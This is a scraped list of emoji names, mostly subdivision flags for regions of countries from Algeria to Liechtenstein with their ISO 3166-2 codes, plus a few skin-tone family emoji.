🏴 Flag for Algiers (DZ-16)
🏴 Flag for Tindouf (DZ-37)
🏴 Flag for Annaba (DZ-23)
🏴 Flag for Blida (DZ-09)
🏴 Flag for Oum El Bouaghi (DZ-04)
🏴 Flag for Mostaganem (DZ-27)
🏴 Flag for Chimborazo (EC-H)
🏴 Flag for Ghardaïa (DZ-47)
🏴 Flag for Bolívar (EC-B)
🏴 Flag for Carchi (EC-C)
🏴 Flag for Aïn Defla (DZ-44)
🏴 Flag for Paphos (CY-05)
🏴 Flag for Relizane (DZ-48)
🏴 Flag for Morona-Santiago (EC-S)
🏴 Flag for Jura (CH-JU)
🏴 Flag for Santa Elena (EC-SE)
🏴 Flag for Lääne (EE-57)
🏴 Flag for Imbabura (EC-I)
🏴 Flag for Aïn Témouchent (DZ-46)
🏴 Flag for Galápagos (EC-W)
🏴 Flag for Napo (EC-N)
👨🏽👶🏽👦🏽 Family - Man: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Pärnu (EE-67)
🏴 Flag for Tartu (EE-78)
🏴 Flag for Azuay (EC-A)
🏴 Flag for Manabí (EC-M)
🏴 Flag for El Oro (EC-O)
🏴 Flag for Pichincha (EC-P)
🏴 Flag for Rapla (EE-70)
🏴 Flag for Saare (EE-74)
👨🏾👶🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Põlva (EE-65)
🏴 Flag for Pastaza (EC-Y)
🏴 Flag for Guayas (EC-G)
🏴 Flag for Los Ríos (EC-R)
🏴 Flag for Sucumbíos (EC-U)
🏴 Flag for Jõgeva (EE-49)
🏴 Flag for Valga (EE-82)
🏴 Flag for Loja (EC-L)
🏴 Flag for Orellana (EC-D)
👨🏼👶🏼👦🏼 Family - Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Naama (DZ-45)
🏴 Flag for Järva (EE-51)
🏴 Flag for North Sinai (EG-SIN)
🏴 Flag for South Sinai (EG-JS)
🏴 Flag for Qena (EG-KN)
🏴 Flag for Viljandi (EE-84)
🏴 Flag for Ismailia (EG-IS)
🏴 Flag for Aswan (EG-ASN)
🏴 Flag for Dakahlia (EG-DK)
🏴 Flag for Gharbia (EG-GH)
🏴 Flag for Beheira (EG-BH)
🏴 Flag for Võru (EE-86)
🏴 Flag for Asyut (EG-AST)
🏴 Flag for Qalyubia (EG-KB)
🏴 Flag for Giza (EG-GZ)
👨🏿👶🏿👦🏿 Family - Man: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Anseba (ER-AN)
🏴 Flag for Kafr el-Sheikh (EG-KFS)
🏴 Flag for Matrouh (EG-MT)
🏴 Flag for Gash-Barka (ER-GB)
🏴 Flag for Minya (EG-MN)
🏴 Flag for Alexandria (EG-ALX)
🏴 Flag for Southern Red Sea (ER-DK)
🏴 Flag for Port Said (EG-PTS)
🏴 Flag for Sohag (EG-SHG)
🏴 Flag for New Valley (EG-WAD)
🏴 Flag for Northern Red Sea (ER-SK)
🏴 Flag for Suez (EG-SUZ)
🏴 Flag for Monufia (EG-MNF)
🏴 Flag for Luxor (EG-LX)
🏴 Flag for Maekel (ER-MA)
🏴 Flag for Damietta (EG-DT)
🏴 Flag for Al Sharqia (EG-SHR)
🏴 Flag for Faiyum (EG-FYM)
🏴 Flag for Debub (ER-DU)
🏴 Flag for Aragon (ES-AR)
🏴 Flag for Anhui (CN-34)
🏴 Flag for Northern Denmark (DK-81)
👨🏻👶🏻👧🏻 Family - Man: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👨🏼👶🏼👧🏼 Family - Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👶🏽👧🏽 Family - Man: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Tigray (ET-TI)
🏴 Flag for Liaoning (CN-21)
🏴 Flag for Gambela (ET-GA)
🏴 Flag for Melilla (ES-ML)
🏴 Flag for Murcia Region (ES-MC)
🏴 Flag for Lapland (FI-10)
🏴 Flag for Central Ostrobothnia (FI-07)
🏴 Flag for Amhara (ET-AM)
🏴 Flag for Benishangul-Gumuz (ET-BE)
🏴 Flag for Oromia (ET-OR)
🏴 Flag for La Rioja (ES-RI)
🏴 Flag for Djibouti (DJ-DJ)
🏴 Flag for Madrid Autonomous Community (ES-MD)
🏴 Flag for Dire Dawa (ET-DD)
🏴 Flag for Mascara (DZ-29)
🏴 Flag for Kainuu (FI-05)
🏴 Flag for Kymenlaakso (FI-09)
🏴 Flag for Southern Ostrobothnia (FI-03)
🏴 Flag for Pirkanmaa (FI-11)
🏴 Flag for Southern Savonia (FI-04)
🏴 Flag for North Karelia (FI-13)
🏴 Flag for South Karelia (FI-02)
🏴 Flag for Harari (ET-HA)
🏴 Flag for Zlínský kraj (CZ-72)
🏴 Flag for Somali (ET-SO)
🏴 Flag for Catalonia (ES-CT)
🏴 Flag for Kosrae (FM-KSA)
🏴 Flag for New Caledonia (FR-NC)
🏴 Flag for Occitanie (FR-OCC)
🏴 Flag for Provence-Alpes-Côte-d’Azur (FR-PAC)
🏴 Flag for Northern Savonia (FI-15)
🏴 Flag for Chuuk (FM-TRK)
🏴 Flag for Bourgogne-Franche-Comté (FR-BFC)
🏴 Flag for Northern Ostrobothnia (FI-14)
🏴 Flag for Rotuma (FJ-R)
🏴 Flag for Mayotte (FR-MAY)
🏴 Flag for Nouvelle-Aquitaine (FR-NAQ)
🏴 Flag for Central (FJ-C)
🏴 Flag for Grand-Est (FR-GES)
🏴 Flag for Northern (FJ-N)
🏴 Flag for Guadeloupe (FR-GUA)
🏴 Flag for Yap (FM-YAP)
🏴 Flag for Bretagne (FR-BRE)
🏴 Flag for French Polynesia (FR-PF)
🏴 Flag for Normandie (FR-NOR)
🏴 Flag for French Guiana (FR-GF)
🏴 Flag for Centre-Val de Loire (FR-CVL)
🏴 Flag for Clipperton Island (FR-CP)
🏴 Flag for St. Martin (FR-MF)
🏴 Flag for Päijänne Tavastia (FI-16)
🏴 Flag for Southwest Finland (FI-19)
🏴 Flag for La Réunion (FR-LRE)
🏴 Flag for Satakunta (FI-17)
🏴 Flag for Shida Kartli (GE-SK)
🏴 Flag for Moyen-Ogooué (GA-3)
👨🏿👶🏿👧🏿 Family - Man: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Saint George (GD-03)
🏴 Flag for Nyanga (GA-5)
🏴 Flag for Ogooué-Ivindo (GA-6)
🏴 Flag for Brong-Ahafo (GH-BA)
🏴 Flag for Haut-Ogooué (GA-2)
🏴 Flag for Saint Andrew (GD-01)
🏴 Flag for Saint Patrick (GD-06)
🏴 Flag for Galicia (ES-GA)
🏴 Flag for Wallis & Futuna (FR-WF)
👨🏻👶🏻👶🏻 Family - Man: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for St. Pierre & Miquelon (FR-PM)
🏴 Flag for Saint John (GD-04)
🏴 Flag for Tbilisi (GE-TB)
👨🏼👶🏼👶🏼 Family - Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Saint David (GD-02)
🏴 Flag for Guria (GE-GU)
🏴 Flag for Woleu-Ntem (GA-9)
🏴 Flag for Racha-Lechkhumi and Kvemo Svaneti (GE-RL)
🏴 Flag for Samtskhe-Javakheti (GE-SJ)
🏴 Flag for Mtskheta-Mtianeti (GE-MM)
🏴 Flag for Imereti (GE-IM)
🏴 Flag for Ogooué-Maritime (GA-8)
🏴 Flag for Shaanxi (CN-61)
🏴 Flag for Greater Accra (GH-AA)
🏴 Flag for Jihomoravský kraj (CZ-64)
🏴 Flag for Adjara (GE-AJ)
🏴 Flag for Samegrelo-Zemo Svaneti (GE-SZ)
🏴 Flag for Estuaire (GA-1)
🏴 Flag for Ogooué-Lolo (GA-7)
🏴 Flag for Kindia Region (GN-D)
🏴 Flag for Mamou Region (GN-M)
👨🏽👶🏽👶🏽 Family - Man: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Qaasuitsup (GL-QA)
🏴 Flag for North Bank Division (GM-N)
🏴 Flag for Sermersooq (GL-SM)
🏴 Flag for Northern (GH-NP)
🏴 Flag for Ionian Islands (GR-F)
🏴 Flag for Central Greece (GR-H)
🏴 Flag for Central (GH-CP)
🏴 Flag for Kankan Region (GN-K)
🏴 Flag for South Aegean (GR-L)
🏴 Flag for Attica (GR-I)
🏴 Flag for Upper River Division (GM-U)
🏴 Flag for Eastern (GH-EP)
🏴 Flag for Nzérékoré Region (GN-N)
🏴 Flag for Western (GH-WP)
🏴 Flag for West Macedonia (GR-C)
🏴 Flag for Río Muni (GQ-C)
🏴 Flag for Lower River Division (GM-L)
🏴 Flag for Upper East (GH-UE)
🏴 Flag for Conakry (GN-C)
🏴 Flag for Central Macedonia (GR-B)
🏴 Flag for Central River Division (GM-M)
🏴 Flag for Upper West (GH-UW)
🏴 Flag for Kujalleq (GL-KU)
🏴 Flag for Boké Region (GN-B)
🏴 Flag for Qeqqata (GL-QE)
🏴 Flag for Epirus (GR-D)
🏴 Flag for Ashanti (GH-AH)
🏴 Flag for Volta (GH-TV)
🏴 Flag for Mount Athos (GR-69)
🏴 Flag for Insular (GQ-I)
🏴 Flag for West Coast Division (GM-W)
🏴 Flag for Banjul (GM-B)
🏴 Flag for Labé Region (GN-L)
🏴 Flag for Thessaly (GR-E)
🏴 Flag for Faranah Region (GN-F)
🏴 Flag for Cuyuni-Mazaruni (GY-CU)
🏴 Flag for Atlántida (HN-AT)
👨🏾👶🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Huehuetenango (GT-HU)
🏴 Flag for Alta Verapaz (GT-AV)
🏴 Flag for El Progreso (GT-PR)
🏴 Flag for Norte (GW-N)
🏴 Flag for Suchitepéquez (GT-SU)
🏴 Flag for Pomeroon-Supenaam (GY-PM)
🏴 Flag for Izabal (GT-IZ)
🏴 Flag for Potaro-Siparuni (GY-PT)
🏴 Flag for Quetzaltenango (GT-QZ)
🏴 Flag for Chimaltenango (GT-CM)
🏴 Flag for Addis Ababa (ET-AA)
🏴 Flag for Bissau (GW-BS)
🏴 Flag for Quiché (GT-QC)
🏴 Flag for Totonicapán (GT-TO)
🏴 Flag for Barima-Waini (GY-BA)
🏴 Flag for Essequibo Islands-West Demerara (GY-ES)
👨🏿👶🏿👶🏿 Family - Man: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Choluteca (HN-CH)
🏴 Flag for Demerara-Mahaica (GY-DE)
👨🏻👨🏻👦🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Sacatepéquez (GT-SA)
🏴 Flag for Jutiapa (GT-JU)
🏴 Flag for Chiquimula (GT-CQ)
🏴 Flag for Baja Verapaz (GT-BV)
🏴 Flag for Escuintla (GT-ES)
🏴 Flag for Zacapa (GT-ZA)
🏴 Flag for Sul (GW-S)
🏴 Flag for Leste (GW-L)
🏴 Flag for Jalapa (GT-JA)
🏴 Flag for Petén (GT-PE)
🏴 Flag for Sololá (GT-SO)
🏴 Flag for Comayagua (HN-CM)
🏴 Flag for Koprivnica-Križevci (HR-06)
🏴 Flag for Copán (HN-CP)
🏴 Flag for Bay Islands (HN-IB)
🏴 Flag for Lika-Senj (HR-09)
🏴 Flag for Santa Bárbara (HN-SB)
🏴 Flag for Intibucá (HN-IN)
🏴 Flag for Francisco Morazán (HN-FM)
🏴 Flag for Zagreb County (HR-01)
🏴 Flag for Colón (HN-CL)
🏴 Flag for Centre (HT-CE)
🏴 Flag for Primorje-Gorski Kotar (HR-08)
🏴 Flag for Lempira (HN-LE)
🏴 Flag for Osijek-Baranja (HR-14)
🏴 Flag for Brod-Posavina (HR-12)
🏴 Flag for Split-Dalmatia (HR-17)
🏴 Flag for Olancho (HN-OL)
🏴 Flag for La Paz (HN-LP)
🏴 Flag for Međimurje (HR-20)
🏴 Flag for El Paraíso (HN-EP)
🏴 Flag for Zagreb (HR-21)
🏴 Flag for Šibenik-Knin (HR-15)
🏴 Flag for Ida-Viru (EE-44)
🏴 Flag for Cortés (HN-CR)
🏴 Flag for Sisak-Moslavina (HR-03)
🏴 Flag for Zadar (HR-13)
🏴 Flag for Istria (HR-18)
🏴 Flag for Krapina-Zagorje (HR-02)
🏴 Flag for Vukovar-Syrmia (HR-16)
🏴 Flag for Yoro (HN-YO)
🏴 Flag for Artibonite (HT-AR)
🏴 Flag for Gracias a Dios (HN-GD)
🏴 Flag for Valle (HN-VA)
🏴 Flag for Jijel (DZ-18)
🏴 Flag for Dubrovnik-Neretva (HR-19)
🏴 Flag for Požega-Slavonia (HR-11)
🏴 Flag for Bjelovar-Bilogora (HR-07)
🏴 Flag for Ocotepeque (HN-OC)
🏴 Flag for Budapest (HU-BU)
🏴 Flag for Hódmezővásárhely (HU-HV)
🏴 Flag for Fejér (HU-FE)
🏴 Flag for Baranya (HU-BA)
🏴 Flag for Székesfehérvár (HU-SF)
🏴 Flag for Borsod-Abaúj-Zemplén (HU-BZ)
🏴 Flag for Csongrád (HU-CS)
🏴 Flag for Sopron (HU-SN)
🏴 Flag for Dunaújváros (HU-DU)
🏴 Flag for Kaposvár (HU-KV)
🏴 Flag for Nyíregyháza (HU-NY)
🏴 Flag for Hajdú-Bihar (HU-HB)
🏴 Flag for Ouest (HT-OU)
🏴 Flag for Szeged (HU-SD)
🏴 Flag for Pest (HU-PE)
🏴 Flag for Komárom-Esztergom (HU-KE)
🏴 Flag for Nagykanizsa (HU-NK)
🏴 Flag for Grand’Anse (HT-GA)
🏴 Flag for Békéscsaba (HU-BC)
🏴 Flag for Sud (HT-SD)
🏴 Flag for Nord-Ouest (HT-NO)
🏴 Flag for Heves (HU-HE)
🏴 Flag for Bács-Kiskun (HU-BK)
🏴 Flag for Miskolc (HU-MI)
🏴 Flag for Érd (HU-ER)
👨🏽👨🏽👦🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Nippes (HT-NI)
🏴 Flag for Szolnok (HU-SK)
🏴 Flag for Nord (HT-ND)
🏴 Flag for Sud-Est (HT-SE)
🏴 Flag for Jász-Nagykun-Szolnok (HU-JN)
🏴 Flag for Pécs (HU-PS)
🏴 Flag for Kecskemét (HU-KM)
🏴 Flag for Debrecen (HU-DE)
🏴 Flag for Békés (HU-BE)
🏴 Flag for Nógrád (HU-NO)
🏴 Flag for Szombathely (HU-SH)
🏴 Flag for Győr (HU-GY)
🏴 Flag for Lesser Sunda Islands (ID-NU)
🏴 Flag for Tatabánya (HU-TB)
🏴 Flag for Java (ID-JW)
🏴 Flag for Chandigarh (IN-CH)
🏴 Flag for Gujarat (IN-GJ)
🏴 Flag for Leinster (IE-L)
🏴 Flag for Zala (HU-ZA)
🏴 Flag for Daman and Diu (IN-DD)
🏴 Flag for Tel Aviv District (IL-TA)
🏴 Flag for Sulawesi (ID-SL)
🏴 Flag for Arunachal Pradesh (IN-AR)
🏴 Flag for Veszprém County (HU-VE)
🏴 Flag for Andaman and Nicobar Islands (IN-AN)
🏴 Flag for Somogy (HU-SO)
🏴 Flag for Vas (HU-VA)
🏴 Flag for Jerusalem (IL-JM)
🏴 Flag for Dadra and Nagar Haveli (IN-DN)
🏴 Flag for Veszprém (HU-VM)
🏴 Flag for Salgótarján (HU-ST)
🏴 Flag for Chhattisgarh (IN-CT)
🏴 Flag for Ulster (IE-U)
🏴 Flag for Delhi (IN-DL)
🏴 Flag for Munster (IE-M)
🏴 Flag for Connacht (IE-C)
🏴 Flag for Haifa District (IL-HA)
🏴 Flag for Kalimantan (ID-KA)
🏴 Flag for Goa (IN-GA)
🏴 Flag for Sumatra (ID-SM)
🏴 Flag for Papua Islands (ID-PP)
🏴 Flag for Szekszárd (HU-SS)
🏴 Flag for Northern District (IL-Z)
🏴 Flag for Tolna (HU-TO)
🏴 Flag for Central District (IL-M)
🏴 Flag for Southern District (IL-D)
🏴 Flag for Bihar (IN-BR)
🏴 Flag for Zalaegerszeg (HU-ZE)
🏴 Flag for Andhra Pradesh (IN-AP)
🏴 Flag for Dohuk (IQ-DA)
🏴 Flag for Jharkhand (IN-JH)
🏴 Flag for Kerala (IN-KL)
🏴 Flag for West Bengal (IN-WB)
🏴 Flag for Odisha (IN-OR)
🏴 Flag for Puducherry (IN-PY)
🏴 Flag for Karbala (IQ-KA)
🏴 Flag for Saladin (IQ-SD)
🏴 Flag for Mizoram (IN-MZ)
🏴 Flag for Himachal Pradesh (IN-HP)
🏴 Flag for Madhya Pradesh (IN-MP)
🏴 Flag for Punjab (IN-PB)
🏴 Flag for Nagaland (IN-NL)
🏴 Flag for Al-Qādisiyyah (IQ-QA)
🏴 Flag for Diyala (IQ-DI)
🏴 Flag for Nineveh (IQ-NI)
🏴 Flag for Dhi Qar (IQ-DQ)
🏴 Flag for Meghalaya (IN-ML)
🏴 Flag for Tamil Nadu (IN-TN)
🏴 Flag for Najaf (IQ-NA)
🏴 Flag for Al Muthanna (IQ-MU)
🏴 Flag for Telangana (IN-TG)
🏴 Flag for Haryana (IN-HR)
🏴 Flag for Uttarakhand (IN-UT)
🏴 Flag for Tripura (IN-TR)
🏴 Flag for Baghdad (IQ-BG)
🏴 Flag for Lakshadweep (IN-LD)
🏴 Flag for Maysan (IQ-MA)
🏴 Flag for Basra (IQ-BA)
🏴 Flag for Erbil (IQ-AR)
🏴 Flag for Maharashtra (IN-MH)
🏴 Flag for Al Anbar (IQ-AN)
🏴 Flag for Sikkim (IN-SK)
🏴 Flag for Babylon (IQ-BB)
🏴 Flag for Uttar Pradesh (IN-UP)
🏴 Flag for Sulaymaniyah (IQ-SU)
🏴 Flag for Rajasthan (IN-RJ)
🏴 Flag for Jammu and Kashmir (IN-JK)
🏴 Flag for Chaharmahal and Bakhtiari (IR-08)
🏴 Flag for Qom (IR-26)
🏴 Flag for Capital (IS-1)
👨🏾👨🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Ardabil (IR-03)
🏴 Flag for Yazd (IR-25)
🏴 Flag for South Khorasan (IR-29)
👨🏿👨🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Hamadan (IR-24)
🏴 Flag for Mahaica-Berbice (GY-MA)
🏴 Flag for Western (IS-3)
🏴 Flag for Golestan (IR-27)
🏴 Flag for Zanjan (IR-11)
🏴 Flag for Lorestan (IR-20)
🏴 Flag for Kermanshah (IR-17)
🏴 Flag for Kohgiluyeh and Boyer-Ahmad (IR-18)
🏴 Flag for Cairo (EG-C)
🏴 Flag for North Khorasan (IR-31)
🏴 Flag for Bushehr (IR-06)
🏴 Flag for Extremadura (ES-EX)
🏴 Flag for Canary Islands (ES-CN)
🏴 Flag for Eastern (IS-7)
🏴 Flag for Ilam (IR-05)
🏴 Flag for Qazvin (IR-28)
🏴 Flag for Isfahan (IR-04)
🏴 Flag for Kerman (IR-15)
🏴 Flag for Hormozgan (IR-23)
🏴 Flag for Wasit (IQ-WA)
🏴 Flag for Piedmont (IT-21)
🏴 Flag for Northeastern (IS-6)
🏴 Flag for Northwestern (IS-5)
🏴 Flag for Markazi (IR-22)
🏴 Flag for Gilan (IR-19)
🏴 Flag for Khuzestan (IR-10)
🏴 Flag for Semnan (IR-12)
🏴 Flag for Southern Peninsula (IS-2)
🏴 Flag for Manchester (JM-12)
🏴 Flag for Irbid (JO-IR)
🏴 Flag for Saint Mary (JM-05)
🏴 Flag for Basilicata (IT-77)
🏴 Flag for Friuli–Venezia Giulia (IT-36)
🏴 Flag for Clarendon (JM-13)
🏴 Flag for Marche (IT-57)
🏴 Flag for Portland (JM-04)
🏴 Flag for Sicily (IT-82)
🏴 Flag for Veneto (IT-34)
🏴 Flag for Abruzzo (IT-65)
🏴 Flag for Molise (IT-67)
🏴 Flag for Balqa (JO-BA)
🏴 Flag for Apulia (IT-75)
🏴 Flag for Calabria (IT-78)
🏴 Flag for Tuscany (IT-52)
🏴 Flag for Hanover (JM-09)
🏴 Flag for Saint Andrew (JM-02)
🏴 Flag for Tafilah (JO-AT)
🏴 Flag for Umbria (IT-55)
🏴 Flag for Saint James (JM-08)
🏴 Flag for Saint Ann (JM-06)
🏴 Flag for Saint Elizabeth (JM-11)
🏴 Flag for Zarqa (JO-AZ)
🏴 Flag for Ostrobothnia (FI-12)
🏴 Flag for Lazio (IT-62)
🏴 Flag for Ajloun (JO-AJ)
🏴 Flag for Liguria (IT-42)
🏴 Flag for Trelawny (JM-07)
🏴 Flag for Aqaba (JO-AQ)
🏴 Flag for Jerash (JO-JA)
🏴 Flag for Amman (JO-AM)
🏴 Flag for Aosta Valley (IT-23)
🏴 Flag for Westmoreland (JM-10)
🏴 Flag for Ibaraki (JP-08)
🏴 Flag for Madaba (JO-MD)
🏴 Flag for Shimane (JP-32)
🏴 Flag for Kyōto (JP-26)
🏴 Flag for Araucanía (CL-AR)
🏴 Flag for Tochigi (JP-09)
🏴 Flag for Akita (JP-05)
🏴 Flag for Chiba (JP-12)
🏴 Flag for Miyagi (JP-04)
🏴 Flag for Niigata (JP-15)
🏴 Flag for Toyama (JP-16)
🏴 Flag for Aichi (JP-23)
🏴 Flag for Tokushima (JP-36)
🏴 Flag for Nagano (JP-20)
🏴 Flag for Tottori (JP-31)
🏴 Flag for Iwate (JP-03)
🏴 Flag for Okayama (JP-33)
🏴 Flag for Ishikawa (JP-17)
🏴 Flag for Wakayama (JP-30)
🏴 Flag for Gunma (JP-10)
🏴 Flag for Mafraq (JO-MA)
🏴 Flag for Yamaguchi (JP-35)
🏴 Flag for Granma (CU-12)
🏴 Flag for Shiga (JP-25)
🏴 Flag for Aomori (JP-02)
🏴 Flag for Saitama (JP-11)
🏴 Flag for Nara (JP-29)
🏴 Flag for Yamanashi (JP-19)
🏴 Flag for Hiroshima (JP-34)
🏴 Flag for Ma’an (JO-MN)
🏴 Flag for Shizuoka (JP-22)
🏴 Flag for Ōsaka (JP-27)
🏴 Flag for Mie (JP-24)
🏴 Flag for Yamagata (JP-06)
🏴 Flag for Hyōgo (JP-28)
🏴 Flag for Karak (JO-KA)
🏴 Flag for Ehime (JP-38)
🏴 Flag for Kanagawa (JP-14)
🏴 Flag for Kagawa (JP-37)
🏴 Flag for Garissa (KE-07)
🏴 Flag for Mandera (KE-24)
🏴 Flag for Kagoshima (JP-46)
🏴 Flag for Kisumu (KE-17)
🏴 Flag for Kilifi (KE-14)
🏴 Flag for Kirinyaga (KE-15)
🏴 Flag for Kajiado (KE-10)
🏴 Flag for Bungoma (KE-03)
🏴 Flag for Nandi (KE-32)
🏴 Flag for Kiambu (KE-13)
🏴 Flag for Laikipia (KE-20)
🏴 Flag for Lamu (KE-21)
🏴 Flag for Fukuoka (JP-40)
🏴 Flag for Busia (KE-04)
🏴 Flag for Saga (JP-41)
🏴 Flag for Migori (KE-27)
🏴 Flag for Embu (KE-06)
👩🏾👦🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Kericho (KE-12)
🏴 Flag for Isiolo (KE-09)
🏴 Flag for Kwale (KE-19)
🏴 Flag for Nagasaki (JP-42)
🏴 Flag for Nairobi County (KE-30)
🏴 Flag for Makueni (KE-23)
🏴 Flag for Murang’a (KE-29)
🏴 Flag for Kōchi (JP-39)
🏴 Flag for Bomet (KE-02)
🏴 Flag for Mombasa (KE-28)
🏴 Flag for Homa Bay (KE-08)
🏴 Flag for Kakamega (KE-11)
🏴 Flag for Machakos (KE-22)
🏴 Flag for Kisii (KE-16)
🏴 Flag for Elgeyo-Marakwet (KE-05)
🏴 Flag for Ōita (JP-44)
🏴 Flag for Narok (KE-33)
🏴 Flag for Meru (KE-26)
🏴 Flag for Kumamoto (JP-43)
🏴 Flag for Miyazaki (JP-45)
🏴 Flag for Stung Treng (KH-19)
🏴 Flag for Samburu (KE-37)
🏴 Flag for West Pokot (KE-47)
🏴 Flag for Taita-Taveta (KE-39)
🏴 Flag for Prey Veng (KH-14)
🏴 Flag for Tharaka-Nithi (KE-41)
🏴 Flag for Osh Region (KG-O)
🏴 Flag for Tbong Khmum (KH-25)
🏴 Flag for Talas (KG-T)
🏴 Flag for Phnom Penh (KH-12)
🏴 Flag for Bishkek (KG-GB)
🏴 Flag for Uasin Gishu (KE-44)
🏴 Flag for Kep (KH-23)
🏴 Flag for Kratié (KH-10)
🏴 Flag for Takéo (KH-21)
🏴 Flag for Battambang (KH-2)
🏴 Flag for Nyeri (KE-36)
🏴 Flag for Preah Vihear (KH-13)
🏴 Flag for Tana River (KE-40)
🏴 Flag for Pailin (KH-24)
🏴 Flag for Ratanakiri (KH-16)
🏴 Flag for Oddar Meanchey (KH-22)
🏴 Flag for Trans Nzoia (KE-42)
🏴 Flag for Sihanoukville (KH-18)
🏴 Flag for Vihiga (KE-45)
🏴 Flag for Osh (KG-GO)
🏴 Flag for Batken (KG-B)
🏴 Flag for Jalal-Abad (KG-J)
🏴 Flag for Mondulkiri (KH-11)
🏴 Flag for Siem Reap (KH-17)
🏴 Flag for Turkana (KE-43)
🏴 Flag for Banteay Meanchey (KH-1)
🏴 Flag for Naryn (KG-N)
🏴 Flag for Nyandarua (KE-35)
🏴 Flag for Siaya (KE-38)
🏴 Flag for Nyamira (KE-34)
🏴 Flag for Pursat (KH-15)
🏴 Flag for Wajir (KE-46)
🏴 Flag for Issyk-Kul (KG-Y)
🏴 Flag for Chuy (KG-C)
🏴 Flag for Mohéli (KM-M)
🏴 Flag for Seoul (KR-11)
🏴 Flag for Kampong Chhnang (KH-4)
🏴 Flag for Daejeon (KR-30)
🏴 Flag for South Hwanghae (KP-05)
🏴 Flag for Kampot (KH-7)
🏴 Flag for Nevis (KN-N)
🏴 Flag for Chagang (KP-04)
🏴 Flag for South Jeolla (KR-46)
🏴 Flag for North Hwanghae (KP-06)
🏴 Flag for Saint Kitts (KN-K)
🏴 Flag for Kampong Speu (KH-5)
🏴 Flag for North Jeolla (KR-45)
🏴 Flag for North Pyongan (KP-03)
🏴 Flag for Koh Kong (KH-9)
🏴 Flag for Kangwon (KP-07)
🏴 Flag for Busan (KR-26)
🏴 Flag for Gwangju City (KR-29)
🏴 Flag for Kampong Cham (KH-3)
🏴 Flag for North Chungcheong (KR-43)
🏴 Flag for Kandal (KH-8)
🏴 Flag for Kampong Thom (KH-6)
🏴 Flag for Ryanggang (KP-10)
🏴 Flag for South Pyongan (KP-02)
🏴 Flag for Grande Comore (KM-G)
🏴 Flag for South Hamgyong (KP-08)
🏴 Flag for Rason (KP-13)
🏴 Flag for Daegu (KR-27)
🏴 Flag for Incheon (KR-28)
🏴 Flag for Gangwon (KR-42)
🏴 Flag for Pyongyang (KP-01)
🏴 Flag for Ulsan (KR-31)
🏴 Flag for South Chungcheong (KR-44)
🏴 Flag for Anjouan (KM-A)
🏴 Flag for Gyeonggi (KR-41)
🏴 Flag for North Gyeongsang (KR-47)
🏴 Flag for North Hamgyong (KP-09)
🏴 Flag for Houaphanh (LA-HO)
🏴 Flag for Bayqongyr (KZ-BAY)
🏴 Flag for Champasak (LA-CH)
🏴 Flag for Vientiane (LA-VT)
🏴 Flag for Hawalli (KW-HA)
🏴 Flag for Phongsaly (LA-PH)
🏴 Flag for Pavlodar (KZ-PAV)
🏴 Flag for Almaty Region (KZ-ALM)
🏴 Flag for Al Asimah (KW-KU)
🏴 Flag for Bokeo (LA-BK)
🏴 Flag for Attapeu (LA-AT)
🏴 Flag for Aktobe (KZ-AKT)
🏴 Flag for Atyrau (KZ-ATY)
🏴 Flag for Al Jahra (KW-JA)
🏴 Flag for Bolikhamsai (LA-BL)
🏴 Flag for Oudomxay (LA-OU)
🏴 Flag for Mangystau (KZ-MAN)
🏴 Flag for West Kazakhstan (KZ-ZAP)
🏴 Flag for Jambyl (KZ-ZHA)
🏴 Flag for Astana (KZ-AST)
🏴 Flag for Luang Prabang (LA-LP)
🏴 Flag for Al Farwaniyah (KW-FA)
🏴 Flag for Kostanay (KZ-KUS)
🏴 Flag for Almaty (KZ-ALA)
🏴 Flag for Karagandy (KZ-KAR)
🏴 Flag for Kyzylorda (KZ-KZY)
🏴 Flag for Salavan (LA-SL)
🏴 Flag for Luang Namtha (LA-LM)
🏴 Flag for Sejong (KR-50)
🏴 Flag for Mubarak Al-Kabeer (KW-MU)
🏴 Flag for North Kazakhstan (KZ-SEV)
👩🏿👦🏿👧🏿 Family - Woman: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Al Ahmadi (KW-AH)
🏴 Flag for Khammouane (LA-KH)
🏴 Flag for Akmola (KZ-AKM)
🏴 Flag for South Kazakhstan (KZ-YUZ)
🏴 Flag for Triesen (LI-09)
👨🏽👨🏽👦🏽👦🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👩🏻👦🏻👶🏻 Family - Woman: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for North Central (LK-7)
🏴 Flag for Sainyabuli (LA-XA)
🏴 Flag for Akkar (LB-AK)
🏴 Flag for Laborie (LC-07)
🏴 Flag for Gros Islet (LC-06)
🏴 Flag for North (LB-AS)
🏴 Flag for Balzers (LI-01)
